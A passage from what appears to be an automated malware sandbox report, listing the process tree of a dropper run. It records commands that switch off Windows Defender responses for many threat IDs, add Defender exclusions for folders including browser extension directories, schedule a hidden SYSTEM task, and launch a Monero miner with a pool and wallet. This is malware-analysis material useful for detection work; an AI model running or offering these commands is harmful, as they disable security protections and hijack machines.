        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:1216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe\" it /WJjdidznYj 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:5344
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5124
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 316 -ip 316
1⤵
PID:868

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\Temp\753631.exe
    "C:\Windows\Temp\753631.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4540

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4540
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3144

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2696

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:2636

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1596
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:4312
- - C:\Windows\Temp\350789.exe
    "C:\Windows\Temp\350789.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3820

C:\Users\Admin\AppData\Local\Temp\7zS33AD.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS33AD.tmp\Install.exe it /WkxdidMIuX 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6124
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5204
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5232
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5264
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5296
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5440
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5420
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5328
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3980
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2324
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5664
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5212
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5176
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5504
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6084
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5784
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5196
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
